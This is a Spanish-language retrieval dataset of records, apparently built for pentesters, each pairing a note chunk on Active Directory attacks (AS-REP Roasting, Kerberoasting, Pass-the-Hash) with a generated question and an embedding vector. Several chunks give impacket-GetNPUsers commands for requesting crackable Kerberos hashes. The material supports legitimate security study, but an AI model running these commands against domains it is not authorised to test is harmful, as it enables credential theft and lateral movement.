"conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# con lista de usuarios (sesiΓ³n nula / enum previa con SMB):\nimpacket-GetNPUsers dominio/ -usersfile users.txt -no-pass -dc-ip IP", "indexar": "ΒΏCon quΓ© puedo realizar un ataque de enumeraciΓ³n de usuarios sin contraseΓ±a?", "v": [-0.15498, 0.13761, -0.12132, -0.12448, -0.02976, -0.04985, -0.04628, -0.04614, -0.12251, -0.05809, -0.03801, -0.03925, -0.0097, -0.06044, 0.0625, -0.02556, 0.1255, 0.07395, 0.10479, -0.00921, -0.00545, -0.07644, 0.03602, 0.06148, -0.05878, 0.0307, 0.0052, 0.04624, -0.01539, -0.12914, 0.02703, -0.10187, 0.05351, 0.05414, 0.06331, 0.13522, 0.02281, 0.14501, 0.12404, 0.17154, 0.06489, 0.03126, -0.19135, 0.04178, 0.02382, 0.04325, 0.0179, 0.00924, 0.09169, -0.02218, -0.07443, 0.01503, -0.12279, -0.12871, -0.05049, -0.097, 0.15173, -0.07769, 0.09859, -0.05707, -0.11552, 0.0223, 0.04831, 0.0666, -0.07661, -0.0624, 0.02623, 0.02137, -0.05132, 0.14573, 0.04188, -0.04411, -0.08826, 0.00351, 0.05029, 0.00194, 0.02025, 0.03381, 0.00066, 0.07077, -0.05808, -0.01471, -0.02168, -0.09756, -0.11993, 0.00737, 0.03437, -0.04147, 0.00269, -0.08222, 0.11377, -0.03826, -0.01239, -0.01669, -0.05191, -0.04933, -0.03541, -0.07385, -0.0633, -0.03411, -0.01952, -0.02085, -0.04682, 0.18234, -0.01044, 0.00316, -0.03397, -0.04937, -0.01675, -0.16633, 0.04254, -0.08446, -0.10544, -0.10201, -0.01814, -0.0358, -0.14603, -0.07916, 0.03465, 0.0316, -0.06539, -0.03918, 0.01667, -0.00253, 0.0408, 0.04636, 0.00999, 0.05582, -0.09348, -0.07957, 0.01745, -0.01397, 0.00625, -0.03339, -0.04287, 0.05921, -0.01845, -0.14864, -0.0877, 0.03058, 0.02942, 0.00575, -0.03964, -0.01953, 0.04012, -0.00748, 0.00995, -0.06759, -0.17077, 0.01532, -0.00718, -0.00496, -0.01078, 0.04285, -0.0119, 0.01414, -0.01975, -0.05508, -0.05227, 0.09153, -0.04238, -0.0274, -0.05223, 0.02873, -0.07024, -0.08091, 0.0192, -0.00701, 0.05317, 0.02771, 0.01697, 0.08651, 0.00372, -0.06265, 0.00805, -0.04298, -0.00508, -0.0268, -0.0011, -0.03619, -0.01232, -0.09247, -0.03815, -0.01218, -0.01944, -0.09245, 0.10038, -0.00523, 0.00083, 0.02167, -0.02027, 0.01966, 0.02287, 0.0534, 0.03024, -0.08348, -0.03895, 0.00047, -0.03193, -0.05429, 0.0319, -0.03769, -0.00714, 0.00539, 0.08744, 0.03029, -0.08739, -0.02461, -0.00255, -0.01618, 0.04669, -0.02765, 0.05653, -0.04066, -0.04215, -0.04192, 0.02446, 0.05867, -0.04553, -0.02338, 0.02283, 0.0355, 0.02566, 0.06728, -0.00096, -0.00128, -0.06923, -0.02006, 0.0142, 0.02452, -0.02255, -0.0228, -0.00146, -0.01244, 0.0862, -0.0499, -0.04085, -0.03605, -0.0627, 0.01452, -0.03633, 0.02393, 0.02528, -0.06057, -0.04585, -0.00681, -0.06641, 0.02872, -0.04636, -0.022, -0.05235, -0.00988, 0.01021, -0.0009, 0.02551, 0.01842]} +{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# con lista de usuarios (sesiΓ³n nula / enum previa con SMB):\nimpacket-GetNPUsers dominio/ -usersfile users.txt -no-pass -dc-ip IP", "indexar": "ΒΏExiste alguna alternativa libre a la tΓ©cnica de GetNPUsers que menciona impacket?", "v": [-0.24918, 0.09701, -0.10001, -0.02572, -0.00772, -0.06198, 0.05381, -0.10623, -0.17407, -0.03481, -0.11911, 0.00076, -0.01423, 0.11696, 0.10346, -0.07087, 0.01854, -0.06009, 0.2474, -0.04767, -0.08468, 0.03399, -0.13767, -0.05981, -0.02723, 0.00222, -0.00936, -0.01259, -0.05301, 0.03939, 0.05065, 0.00321, -0.08506, -0.13179, -0.07227, 0.00308, 0.22108, 1e-05, 0.16392, -0.00693, 0.00627, -0.02378, -0.09216, -0.02034, 0.09316, -0.08753, -0.03983, 0.08625, -0.02288, 0.05073, 0.04345, 0.03325, -0.06143, -0.01988, 0.07176, -0.02184, 0.13766, -0.03074, -0.04786, 0.07001, 0.058, 0.08836, 0.02556, -0.07268, 0.07293, 0.05711, -0.03612, -0.07121, -0.0906, 0.02743, 0.05163, -0.0594, 0.07859, -0.05452, -0.10789, 0.04996, -0.08613, 0.05865, 0.00419, 0.15414, 0.01871, 0.00489, -0.00827, 0.02619, -0.11382, -0.07713, -0.02741, -0.09188, 0.06215, -0.05259, 0.06082, 0.03805, -0.00237, 0.09061, 0.07443, -0.01848, 0.02696, 0.13782, -0.02092, 0.08055, 0.05049, 0.00774, -0.04329, -0.07533, -0.08786, -0.10308, 0.02536, 0.01812, -0.04101, -0.015, 0.03605, 0.12601, -0.02317, 0.03467, -0.02964, -0.06264, 0.02232, -0.04542, -0.03426, 0.0069, 0.02249, -0.00347, 0.04875, -0.0267, 0.0182, -0.06352, 0.03904, 0.0465, 0.00633, -0.04241, -0.00776, -0.05501, -0.02141, -0.10281, -0.07244, -0.02401, 0.11043, -0.0109, 0.02976, 0.01703, -0.00177, 0.02679, -0.03591, 0.06143, -0.06473, -0.05111, 0.06105, -0.01903, -0.02384, -0.06763, 0.03264, -0.04388, 0.04591, 0.15231, -0.01293, -0.01566, 0.0258, -0.07867, -0.03293, 0.02013, 0.01894, -0.02002, -0.08361, 0.02323, -0.02584, 0.01827, 0.02319, -0.01991, -0.10326, 0.09312, -0.03835, 0.01828, 0.06577, 0.00906, 0.0055, -0.07493, 0.02284, -0.04078, 0.07311, -0.05562, -0.02536, 0.01298, -0.01918, -0.05832, 0.04723, -0.04283, -0.04065, -0.0539, 0.00839, 0.04912, -0.02605, -0.03467, -0.03476, -0.06412, -0.0877, -0.02369, 0.05971, -0.04659, -0.03081, 0.04085, -0.07165, -0.00985, 0.03934, -0.06598, -0.03852, 0.00316, -0.09113, 0.00759, -0.06795, 0.05093, 0.06979, -0.02084, 0.03112, -0.03708, -0.03401, 0.0402, -0.01043, 0.01037, -0.02637, -0.029, 0.02427, 0.02578, 0.03486, 0.03208, 0.02864, 0.03427, 0.07985, 0.04403, -0.06901, -0.01708, 0.02387, 0.03087, -0.00652, 0.02531, 0.02238, 0.03555, 0.01598, 0.0245, 0.03399, 0.07577, 0.0426, 0.02615, -0.01679, -0.03138, -0.04142, 0.00467, -0.09881, -0.02866, 0.00487, -0.03947, -0.00099, -0.01469, -0.02718, 0.01581, 0.0171, 0.03901]} +{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# con credenciales (enumera y pide a la vez):\nimpacket-GetNPUsers dominio/usuario:password -request -dc-ip IP\n```", "indexar": "con que herramienta puedo enumerar usuarios en un dominio usando contraseΓ±as?", "v": [0.01378, 0.07385, -0.1351, -0.23236, -0.05294, -0.06114, -0.0476, -0.08626, -0.13577, -0.0674, -0.05442, -0.02979, -0.02012, -0.17413, -0.01403, -0.02962, 0.17654, -0.02301, 0.01088, 0.00633, -0.02364, -0.04096, -0.0922, 0.01972, -0.04404, -0.04632, -0.00624, -0.0922, -0.06258, 0.09538, 0.04178, -0.03762, 0.04866, -0.02244, -0.08876, 0.00736, -0.0066, 0.11002, 0.08686, 0.14553, 0.09038, 0.0669, -0.1854, 0.03799, -0.03255, 0.08369, -0.05581, -0.0642, 0.06022, -0.05717, -0.06983, -0.17401, -0.15442, -0.0762, 0.0067, -0.15167, 0.21826, -0.08723, 0.03554, -0.06746, -0.12096, -0.02419, 0.01189, 0.11989, -0.11015, -0.09054, 0.04276, -0.00094, -0.07571, 0.11991, 0.04257, 0.01662, 0.01055, 0.0047, 0.10235, -0.0161, 0.07516, -0.0154, 0.05137, 0.0245, -0.03887, -0.0547, -0.00753, -0.05805, -0.14104, -0.0669, 0.01485, -0.06366, 0.08962, -0.04087, 0.0549, 0.05696, -0.01928, -0.02587, 0.00241, -0.02843, 0.04998, -0.06439, -0.06499, -0.07553, 0.10545, 0.10636, -0.07598, 0.12899, 0.03798, 0.02162, -0.0097, -0.06719, -0.02683, -0.06305, 0.05453, -0.02826, -0.02617, -0.05857, -0.02167, 0.07768, -0.06571, -0.09712, 0.03251, -0.05312, 0.02715, -0.03977, -0.02285, -0.02438, 0.05436, 0.0356, 0.00082, 0.02651, -0.08696, -0.2038, 0.02793, -0.03981, -0.0567, 0.01602, -0.03922, 0.06574, 0.02241, -0.09557, -0.06374, 0.00567, -0.02789, 0.01897, -0.07868, -0.04124, 0.03625, -0.00145, 0.02837, -0.07714, -0.0646, -0.0254, -0.02366, -0.0426, -0.03582, 0.05028, -0.03203, 0.05799, -0.07575, -0.00947, -0.0916, 0.06062, -0.03385, -0.05065, -0.01098, 0.02571, -0.03995, -0.03966, 0.07089, 0.05355, 0.02519, 0.05409, 0.02931, 0.06601, 0.05671, 0.00259, 0.00366, -0.029, -0.01363, -0.00249, -0.03379, -0.05887, -0.01791, -0.08887, -0.02663, 0.00519, -0.01302, -0.0212, 0.06027, 0.00582, -0.02068, 0.01507, -0.00939, 0.05022, 0.01011, 0.00251, 0.03973, -0.00845, 0.00139, -0.01724, -0.01991, -0.04707, 0.00419, -0.01122, -0.00738, -0.01404, 0.03015, 0.01469, -0.04365, -0.04138, 0.02362, -0.03683, 0.00213, -0.00067, -0.02162, -0.04093, -0.03563, -0.03597, -0.02583, 0.04196, -0.06473, -0.08893, -0.01776, 0.03109, 0.02004, 0.02504, 0.0141, 0.02563, -0.03262, -0.00884, 0.00674, 0.01001, 0.01729, -0.01786, -0.01958, 0.00391, 0.06026, -0.06068, -0.01274, -0.0195, -0.02675, 0.00957, -0.07623, 0.03226, 0.04632, -0.0261, -0.07592, -0.03946, -0.02835, -0.01159, -0.04074, -0.02193, -0.02159, 0.0142, 0.02836, -0.02013, -0.0325, 0.00053]} +{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# con credenciales (enumera y pide a la vez):\nimpacket-GetNPUsers dominio/usuario:password -request -dc-ip IP\n```", "indexar": "cual programa sirve para obtener nombres de usuario con credenciales?", "v": [-0.07736, 0.06738, -0.01953, -0.11209, 0.13368, -0.1746, 0.00034, -0.13767, -0.08656, -0.14944, 0.00506, -0.05831, -0.07621, -0.15962, -0.0041, 0.02068, 0.15907, -0.001, 0.14476, 0.05272, 0.04164, -0.04154, -0.0918, -0.07544, -0.17039, -0.0297, 0.02463, -0.07734, 0.07201, 0.06149, 0.05421, -0.07653, -0.01534, -0.13393, -0.00868, 0.08473, -0.00622, 0.00921, -0.05278, 0.23772, 0.02277, 0.0093, -0.05822, 0.05443, 0.09619, 0.02584, -0.07436, 0.09962, -0.01632, -0.11368, 0.0491, -0.0019, -0.09146, -0.06612, 0.01825, -0.07596, 0.0104, -0.12866, -0.13677, 0.0537, -0.07057, -0.05869, 0.09158, 0.02057, -0.01371, -0.09003, 0.03953, -0.04516, -0.07225, -0.02509, -0.01444, 0.05536, 0.06327, -0.0715, 0.04814, -0.03626, 0.00362, -0.04322, 0.04739, -0.04939, 0.0237, -0.08148, -0.00994, 0.00583, -0.06257, -0.0108, 0.05384, -0.02883, 0.00411, 0.00451, 0.07858, 0.12527, 0.04078, 0.11841, 0.07026, -0.0108, 0.08017, 0.04038, -0.04913, 0.02972, 0.08311, -0.01995, -0.06641, 0.15016, -0.09354, 0.06636, 0.04596, -0.02601, -0.08908, -0.00356, 0.06171, 0.04098, -0.08873, 0.0215, -0.0248, 0.06713, -0.04654, -0.09933, 0.06274, -0.06406, -0.09161, 0.01777, 0.02902, 0.00074, 0.08607, 0.03521, 0.00513, 0.03498, -0.06394, -0.00713, -0.02417, -0.01473, 0.0245, -0.00531, -0.03402, -0.1219, 0.01712, -0.02571, -0.02215, 0.00265, 0.0639, 0.08124, 0.00521, -0.0252, 0.00873, 0.03869, 0.07749, -0.07792, 0.06905, -0.0556, 0.01164, 0.07246, -0.04498, 0.06879, -0.08475, -0.06939, -0.00614, -0.02325, -0.06228, -0.00373, -0.05445, -0.01997, 0.00909, -0.02852, -0.00864, -0.08527, 0.03547, -0.00713, 0.10549, 0.09361, 0.01846, 0.04231, -0.01979, -0.05157, 0.01241, 0.00464, -0.03352, -0.05089, -0.00254, -0.03229, -0.07612, 0.02415, 0.0309, 0.04355, 0.00167, -0.03631, -0.0443, 0.05435, 0.00791, -0.02756, -0.01856, 0.02441, -0.06045, -0.04737, -0.02515, 0.02053, 0.04586, -0.02533, 0.03839, -0.09287, -0.03605, 0.01041, -0.005, 0.02991, 0.05166, 0.07559, 0.03782, -0.00475, 0.05994, 0.09772, 0.00745, -0.04207, 0.0445, 0.01666, -0.07883, -0.09021, -0.0276, 0.01938, 0.02184, 0.02963, -0.06505, -0.04603, 0.00259, 0.07652, -0.00017, -0.05178, 0.06154, -0.04895, -0.03929, 0.00727, -0.01352, -0.01708, -0.02496, -0.07604, 0.03049, -0.00649, -0.02245, 0.027, -0.01557, -0.08837, -0.07516, 0.07606, 0.00243, -0.0308, -0.02748, 0.02439, -0.03503, 0.01478, -0.02786, -0.01278, -0.0686, 0.07598, 0.01342, -0.02258, 0.11051, 0.01418]} +{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# con credenciales (enumera y pide a la vez):\nimpacket-GetNPUsers dominio/usuario:password -request -dc-ip IP\n```", "indexar": "que herramienta permite pedir a los usuarios directamente si conozco sus datos?", "v": [0.01192, 0.1149, -0.18746, -0.17153, 0.1079, -0.19453, -0.04139, -0.10711, -0.08345, -0.08031, -0.04675, -0.11451, -0.01059, -0.12644, 0.03703, -0.0253, 0.12401, -0.0051, 0.02498, -0.03533, 0.01657, -0.05537, -0.05851, -0.09958, -0.1404, -0.02409, 0.061, -0.06289, -0.14476, 0.14285, 0.00699, -0.09718, -0.07837, 0.02361, -0.08797, 0.00382, 0.02939, 0.094, 0.0202, 0.05301, 0.00536, 0.02146, -0.05684, -0.00615, 0.03381, 0.047, -0.13896, 0.01918, 0.00941, 0.04959, -0.0813, -0.13737, -0.15567, -0.00459, -0.09558, -0.12259, 0.19356, -0.08667, 0.09386, -0.06611, -0.04567, -0.04243, -0.00118, 0.09844, -0.01713, -0.0035, 0.09449, -0.01861, -0.06497, 0.12429, 0.01804, 0.07041, 0.01973, -0.03734, 0.09176, -0.0559, 0.04415, 0.06863, 0.03329, -0.02741, -0.03189, -0.00957, -0.07991, -0.06087, -0.04614, -0.04514, 0.06494, -0.01688, 0.03404, -0.02454, 0.08104, 0.1472, 0.01991, -0.01478, 0.07547, 0.0251, 0.03167, -0.09009, -0.03089, -0.02018, 0.07001, 0.02398, -0.08304, 0.06091, 0.00673, 0.02418, 0.01534, -0.04457, -0.1139, -0.00949, 0.00936, 0.00555, 0.04827, 0.0044, 0.07046, 0.06898, -0.01491, -0.10073, -0.01753, -0.03952, 0.04121, 0.00292, 0.05965, -0.07185, -0.00857, 0.00502, -0.05771, 0.07577, -0.0214, -0.09037, 0.01563, -0.08499, -0.05549, 0.04455, 0.01513, 0.00492, -0.02953, -0.11313, 0.04849, -0.08024, -0.00801, 0.0671, -0.0984, -0.06499, 0.06121, -0.06593, -0.01572, 0.00408, -0.0493, -0.03851, 0.00846, -0.01664, -0.03317, 0.03209, -0.06996, 0.07367, -0.02145, -0.04445, -0.12734, -0.01448, -0.02226, -0.06948, 0.02569, -0.00347, -0.05039, -0.08596, 0.02738, 0.01509, 0.04689, 0.07144, -0.03173, 0.06201, 0.06608, -0.04484, 0.02962, 0.02908, -0.02762, -0.04745, -0.03466, -0.05241, -0.04548, -0.05016, -0.00119, -0.05176, -0.01932, -0.04557, 0.02588, -0.03024, 0.02055, 0.01312, -0.03439, 0.13864, 0.07787, -0.00266, 0.067, -0.0216, -0.02665, 0.02564, 0.06275, -0.03012, -0.0698, 0.02748, -0.04323, -0.03085, -0.01816, 0.07017, 0.02138, -0.01973, 0.04689, -0.0606, 0.00626, -0.02211, 0.01852, -0.02376, 0.04477, -0.02916, 0.05154, 0.00312, -0.01878, -0.04643, -0.07414, 0.05217, 0.09888, -0.02631, -0.02514, 0.05344, 0.02581, 0.00639, -0.02831, -0.03355, 0.04393, -0.04441, -0.00678, -0.01152, 0.05659, -0.06905, -0.0022, -0.01648, -0.04633, -0.03456, 0.00135, 0.07236, -0.0012, -0.00696, -0.02409, -0.03617, -0.05607, -0.01539, -0.04889, -0.07581, -0.01492, -0.0043, 0.04181, -0.07127, -0.00516, -0.04137]} +{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Diferencia con Kerberoasting\n- **AS-REP** = usuarios SIN pre-auth β†’ **no necesitas password** para pedir el hash.\n- **Kerberoasting** = cuentas de servicio (SPN) β†’ necesitas una credencial vΓ‘lida.\n\nRelacionado: Cracking de contraseΓ±as Β· Kerberoasting Β· Kerberos Β· Impacket Β· OSCP MOC", "indexar": "que diferencia hay entre as-rep y kerberoasting en cracking?", "v": [0.10507, -0.17026, -0.07936, 0.07212, 0.05503, -0.11421, -0.03348, 0.32634, 0.03437, -0.09085, -0.0649, -0.0757, -0.04954, -0.18357, 0.16164, -0.00965, -0.26465, 0.14177, 0.09469, -0.01173, 0.04353, 0.02506, 0.09085, 0.03206, 0.02293, -0.03462, -0.04581, 0.07347, -0.1286, 0.05614, 0.0081, 0.11401, 0.02548, -0.0237, -0.06856, 0.07049, 0.05342, -0.05046, 0.10253, 0.08757, 0.00896, -0.02027, -0.01745, 0.01325, -0.01408, 0.01901, -0.10924, 0.14116, -0.03886, 0.08198, -0.00636, 0.04313, 0.0124, -0.07449, -0.02724, -0.03847, 0.05711, 0.06633, -0.01859, -0.06294, -0.05141, 0.04551, -0.09991, -0.04968, -0.03141, -0.16853, -0.02082, -0.16079, 0.09815, 0.03573, -0.03639, 0.01945, 0.03466, -0.0088, 0.05361, 0.09456, 0.08407, 0.0219, -0.04628, -0.00334, -0.04467, -0.02499, -0.04932, 0.05535, 0.01363, -0.09274, 0.13987, -0.01729, 0.03797, 0.05971, -0.04236, 0.14771, -0.08473, 0.05687, -0.07561, -0.04246, -0.02781, 0.0709, -0.04733, 0.04913, 0.03653, -0.01636, -0.09293, 0.00594, -0.04107, 0.06129, 0.04173, -0.08973, 0.00763, -0.05375, 0.01882, 0.0415, -0.00579, -0.05464, -0.08269, -0.04184, 0.00483, 0.00613, 0.02717, -0.03003, -0.13609, 0.03651, -0.00967, 0.00419, -0.01217, -0.00825, 0.04131, 0.10313, -0.0445, 0.09084, -0.01982, 0.00343, -0.03337, 0.06247, 0.02027, -0.03111, 0.00891, -0.02845, 0.02544, -0.00125, -0.00464, 0.06297, 0.05007, 0.03902, -0.06615, -0.00326, -0.03063, -0.04278, -0.11666, 0.0479, -0.03769, 0.0028, -0.02264, 0.05232, -0.06668, -0.05216, -0.03525, -0.01959, -0.01138, 0.04269, -0.01903, 0.00069, 0.02838, -0.02905, 0.07377, 0.02536, -0.03737, -0.03977, 0.06077, -0.04261, -0.00171, 0.06633, -0.02622, 0.07132, 0.02611, 0.02021, 0.02169, -0.00281, 0.0181, -0.04166, 0.00698, -0.02578, -0.03434, 0.01179, 0.01419, -0.02774, -0.01635, -0.03701, -0.06, 0.02936, 0.06014, -0.02348, -0.01956, 0.06934, 0.0116, -0.04284, 0.04463, 0.00135, 0.03758, 0.06622, -0.09277, -0.05444, -0.01645, -0.00304, 0.0609, 0.02705, -0.04171, -0.02489, 0.00715, 0.06377, 0.08109, -0.02048, -0.0314, -0.00664, -0.00484, 0.02508, 0.05801, 0.01774, -0.06565, 0.00802, 0.03592, 0.06391, 0.01504, -0.00922, -0.0627, -0.04065, -0.0462, -0.04006, -0.03072, 0.09342, 0.06759, 0.01341, 0.02076, -0.05956, 0.00147, 0.06252, 0.01362, 0.00338, 0.03396, -0.04444, -0.00705, -0.02553, 0.01687, 0.04808, 0.03243, -0.00246, -0.03948, -0.00017, -0.01582, -0.00414, -0.01767, 0.02786, -0.0237, -0.015, -0.03287, -0.02822]} +{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Diferencia con Kerberoasting\n- **AS-REP** = usuarios SIN pre-auth β†’ **no necesitas password** para pedir el hash.\n- **Kerberoasting** = cuentas de servicio (SPN) β†’ necesitas una credencial vΓ‘lida.\n\nRelacionado: Cracking de contraseΓ±as Β· Kerberoasting Β· Kerberos Β· Impacket Β· OSCP MOC", "indexar": "con que tecnica puedo pedir un hash sin tener la contraseΓ±a?", "v": [0.03464, -0.01435, -0.19243, -0.14245, 0.00801, -0.06768, -0.08657, -0.04121, 0.00725, 0.01829, -0.00279, 0.13802, 0.01798, -0.04146, 0.09261, 0.05676, 0.11893, 0.00848, 0.18196, 0.03523, 0.0353, -0.03051, -0.11155, -0.03009, 0.00528, -0.10327, 0.04201, 0.00028, -0.21964, -0.1339, -0.01294, -0.05705, 0.00025, 0.11967, -0.04847, 0.25141, -0.03286, 0.11664, 0.07229, 0.08177, -0.05678, 0.10543, -0.07885, 0.09854, 0.03442, -0.02382, 0.05135, 0.05702, 0.03505, -0.02316, -0.05078, -0.0796, -0.11823, -0.10275, -0.04792, -0.12238, 0.17932, 0.01058, -0.03298, -0.07874, -0.05468, 0.00766, 0.09003, 0.11208, -0.0645, -0.08501, 0.06932, 0.02281, -0.01779, 0.06561, 0.00054, 0.01371, -0.1174, 0.01719, 0.00368, 0.04327, -0.03282, -0.02286, 0.03926, 0.06009, -0.06146, 0.0191, 0.02912, -0.03602, -0.09331, -0.04627, 0.02988, -0.05713, 0.11601, -0.08135, 0.09572, -0.00037, -0.01046, -0.02976, 0.03455, -0.01634, -0.01795, 0.03219, -0.11241, -0.05759, -0.02654, -0.00114, -0.06533, 0.11761, -0.00781, -0.01099, 0.05681, -0.05716, 0.05995, -0.04696, 0.01732, 0.02033, -0.0561, -0.00446, -0.06082, -0.05399, -0.0877, -0.10755, -0.04183, 0.05857, -0.02596, -0.10203, 0.08328, 0.07445, 0.08258, -0.00638, -0.03647, 0.06034, -0.031, -0.0579, 0.04299, 0.00479, -0.0382, -0.00316, 0.00312, 0.08371, 0.01072, -0.09099, -0.11037, 0.00174, -0.02295, 0.05354, -0.00928, -0.10134, 0.04283, 0.01628, 0.02862, -0.06556, -0.1099, -0.04037, -0.017, -0.00485, 0.03696, 0.06373, -0.04028, 0.03157, 0.02362, -0.10619, 0.00962, 0.08673, -0.03355, 0.00812, -0.08437, 0.01212, -0.11417, -0.0226, -0.01782, -0.00565, 0.01185, 0.01853, 0.00141, 0.00208, -0.02377, -0.00971, 0.00079, 0.00285, -0.00543, -0.0121, -0.04109, -0.0854, -0.05432, -0.06067, -0.0052, -0.03257, 0.02232, -0.05555, 0.06902, 0.00069, 0.02159, -0.02044, 0.03512, 0.02605, -0.04382, 0.11674, -0.01222, -0.0306, -0.01654, -0.00164, 0.0277, -0.05765, 0.0178, 0.00573, 0.01111, -0.06299, 0.06319, -0.00464, -0.08309, -0.04018, -0.02807, -0.0402, 0.01892, -0.02099, 0.02772, -0.053, -0.04139, -0.0212, -0.00138, 0.04845, -0.06937, -0.01188, 0.06197, 0.07081, 0.05856, 0.02687, -0.00882, -0.01656, -0.04504, 0.07623, 0.02098, 0.03397, -0.01906, 0.04786, -0.03921, 0.02413, 0.09963, 0.01535, -0.05808, -0.05207, -0.04439, -0.02014, -0.02072, 0.02196, 0.0001, -0.07011, -0.03533, -0.02199, -0.09145, 0.0169, 0.02791, -0.0085, -0.04989, 0.00911, 0.0342, -0.02587, 0.01006, -0.02218]} +{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Diferencia con Kerberoasting\n- **AS-REP** = usuarios SIN pre-auth β†’ **no necesitas password** para pedir el hash.\n- **Kerberoasting** = cuentas de servicio (SPN) β†’ necesitas una credencial vΓ‘lida.\n\nRelacionado: Cracking de contraseΓ±as Β· Kerberoasting Β· Kerberos Β· Impacket Β· OSCP MOC", "indexar": "cual es el metodo para rostellar cuentas de servicio?", "v": [0.0701, 0.00183, -0.06699, -0.02071, 0.02516, -0.1539, 0.05213, -0.14291, -0.12431, -0.05123, -0.27777, -0.12998, 0.08922, 0.01445, 0.11353, -0.07932, 0.07994, 0.05416, -0.03301, -0.09335, -0.05299, -0.22464, -0.12044, -0.02975, -0.08469, 0.03946, 0.07484, -0.11716, -0.09313, 0.11223, 0.04896, -0.08806, -0.01338, -0.08446, 0.00583, -0.04861, -0.00467, 0.02301, -0.09191, 0.05411, -0.05434, -0.06535, 0.00985, 0.052, 0.01149, -0.06464, -0.02294, 0.0749, 0.04997, 0.17504, 0.02338, -0.08123, -0.08192, 0.04752, -0.13873, -0.02715, -0.0249, -0.04286, -0.12479, -0.0352, 0.01523, -0.04532, 0.08205, -0.03341, -0.00588, -0.04956, 0.03476, 0.03654, -0.09284, -0.00498, -0.01742, 0.08627, -0.00094, 0.07305, -0.02969, 0.00585, 0.08437, -0.0499, -0.03458, -0.02213, -0.04563, -0.06279, -0.11406, 0.06395, -0.12569, -0.01151, -0.01322, -0.05274, 0.07405, -0.03455, -0.0408, -0.05437, -0.05478, 0.11255, -0.04059, -0.0096, 0.09143, -0.00921, -0.022, -0.0166, 0.09547, 0.03126, -0.1258, 0.1021, -0.00427, 0.0901, 0.03759, -0.03638, 0.00793, -0.04141, -0.01505, 0.00442, -0.08238, 0.05717, -0.03076, -0.04727, -0.03798, -0.01229, -0.06242, -0.03216, -0.01972, 0.03466, 0.01872, 0.05374, 0.03779, -0.10138, -0.00434, 0.07918, 0.0255, 0.00698, -0.00084, -0.04959, -0.0416, 0.00136, 0.05938, -0.04612, -0.00225, -0.01609, -0.01959, 0.03468, -0.03066, 0.02289, -0.03374, -0.13274, 0.09573, -0.02125, 0.08252, -0.07581, -0.08108, -0.02377, 0.00909, -0.01659, -0.04416, 0.04028, -0.04167, -0.08202, 0.04341, -0.03694, -0.06522, 0.10191, -0.00708, -0.03642, 0.10123, 0.02397, -0.01027, -0.08065, 0.01274, -0.00168, 0.03612, -0.04853, -0.05567, 0.0487, 0.00825, -0.01686, 0.02887, -0.02712, -0.05743, -0.10243, 0.01067, 0.00917, -0.0357, -0.00026, 0.0285, -0.08195, -0.00567, -0.04221, -0.03078, 0.04538, 0.00717, 0.01424, -0.04133, -0.03435, -0.08109, -0.02171, -0.03532, -0.01622, 0.00608, -0.02752, 0.01407, -0.08465, -0.06624, 0.08476, 0.00788, 0.02354, -0.02523, 0.03674, 0.02091, 0.02776, -0.0414, 0.04031, 0.04194, -0.05237, 0.07595, -0.09255, -0.02435, -0.02282, -0.0581, -0.12698, -0.01708, 0.0711, 0.01554, -0.06756, -0.00424, 0.02168, -0.04245, 0.03505, 0.01272, -0.01993, 0.0046, 0.04234, -0.04057, -0.02213, -0.00419, -0.00879, -0.01838, 0.04707, 0.08824, -0.05825, 0.01888, -0.05045, 0.05625, 0.06589, 0.02827, -0.01417, -0.04588, 0.01674, -0.092, 0.00819, -0.0327, -0.09763, 0.0775, 0.00425, -0.01445, 0.0285, 0.04348, -0.05262]} +{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Pass-the-Hash\n\n> Te autenticas con el **hash NTLM** sin conocer la contraseΓ±a en claro. La base del Movimiento lateral en AD.", "indexar": "que tecnica sirve para autenticarse sin conocer la contraseΓ±a?", "v": [0.01526, -0.04121, -0.28153, -0.16006, 0.13007, -0.14655, -0.06597, -0.1259, -0.01498, 0.00492, -0.0094, 0.01224, 0.01342, -0.01436, 0.12051, 0.02948, 0.13578, 0.01054, 0.1851, 0.04242, 0.07554, -0.09652, -0.02994, -0.05521, 0.00577, -0.10409, 0.05109, -0.06622, -0.04201, -0.11771, 0.0612, 0.02419, 0.07589, 0.03357, 0.02162, 0.15073, -0.00454, 0.02308, 0.05024, 0.07667, 0.05728, 0.03292, -0.01782, 0.15372, 0.06431, 0.05082, 0.08319, 0.05238, 0.039, 0.06168, -0.1404, -0.01103, -0.03533, -0.06451, -0.11899, -0.13176, 0.1826, 0.05095, 0.01221, -0.02813, -0.08124, -0.04166, 0.07026, 0.03441, -0.03765, -0.06853, 0.10899, -0.03522, 0.00495, -0.00664, 0.00027, 0.03576, -0.04451, 0.0171, -0.07454, -0.02869, -0.00827, 0.05737, 0.10563, 0.02503, -0.0339, 0.01867, -0.00732, -0.05477, -0.05224, 0.00482, 0.08302, -0.04209, 0.10763, -0.14983, 0.08188, 0.04487, -0.00177, -0.00563, 0.0471, -0.00629, -0.0054, -0.02976, 